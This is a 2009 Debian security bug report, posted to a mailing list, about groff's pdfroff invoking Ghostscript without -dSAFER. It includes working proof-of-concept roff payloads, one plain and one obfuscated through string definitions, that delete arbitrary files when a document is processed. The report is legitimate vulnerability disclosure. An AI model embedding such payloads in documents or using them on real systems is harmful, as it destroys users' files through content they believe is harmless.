[Secure-testing-team] Bug#538338: groff: pdfroff invokes gs insecurely (without -dSAFER)

brian m. carlson sandals at crustytoothpaste.ath.cx
Fri Jul 24 22:17:15 UTC 2009 

Package: groff
Version: 1.20.1-4
Severity: grave
File: /usr/bin/pdfroff
Tags: security

pdfroff invokes gs without -dSAFER, leading to the ability to write,
rename, and delete arbitrary files:

  lakeview ok % cat attack.roff
  I am an evil attacking document.  Boo!
  \X'ps: exec (/tmp/remove-me) deletefile'
  lakeview ok % touch /tmp/remove-me && pdfroff attack.roff >/dev/null && [ ! -f "/tmp/remove-me" ] && echo removed
  GPL Ghostscript SVN PRE-RELEASE 8.64: Unrecoverable error, exit code 1
  removed

Using ps2pdf may be a better solution, since it uses -dSAFER
automatically.

Obviously, this is a fairly straightforward example, but in a document
the size of groff's -me manual, this could easily be hidden.  Disguising
it is easy, such as in:

  lakeview ok % cat attack.roff
  I am an evil attacking document.  Boo!
  .ds df deletefile
  .ds fn /tmp/remove-me
  \X'ps: exec (\*(fn) \*(df'

Processing or viewing a document from an unknown source shouldn't by
default cause code from that document to be executed, in general.

-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/zsh4

Versions of packages groff depends on:
ii  groff-base                    1.20.1-4   GNU troff text-formatting system (
ii  libc6                         2.9-21     GNU C Library: Shared libraries
ii  libgcc1                       1:4.4.1-1  GCC support library
ii  libice6                       2:1.0.5-1  X11 Inter-Client Exchange library
ii  libsm6                        2:1.1.0-2  X11 Session Management library
ii  libstdc++6                    4.4.1-1    The GNU Standard C++ Library v3
ii  libx11-6                      2:1.2.2-1  X11 client-side library
ii  libxaw7                       2:1.0.5-2  X11 Athena Widget library
ii  libxmu6                       2:1.0.4-1  X11 miscellaneous utility library
ii  libxt6                        1:1.0.5-3  X11 toolkit intrinsics library

Versions of packages groff recommends:
ii  ghostscript                8.64~dfsg-13  The GPL Ghostscript PostScript/PDF
ii  imagemagick                7:6.5.1.0-1.1 image manipulation programs
ii  libpaper1                  1.1.23+nmu1   library for handling paper charact
ii  netpbm                     2:10.0-12     Graphics conversion tools
ii  psutils                    1.17-26       A collection of PostScript documen

groff suggests no packages.

-- no debconf information

-- 
brian m. carlson / brian with sandals: Houston, Texas, US
+1 713 440 7475 | http://crustytoothpaste.ath.cx/~bmc | My opinion only
OpenPGP: RSA v4 4096b 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 835 bytes
Desc: Digital signature
URL: <http://lists.alioth.debian.org/pipermail/secure-testing-team/attachments/20090724/56b57d18/attachment.pgp>

More information about the Secure-testing-team mailing list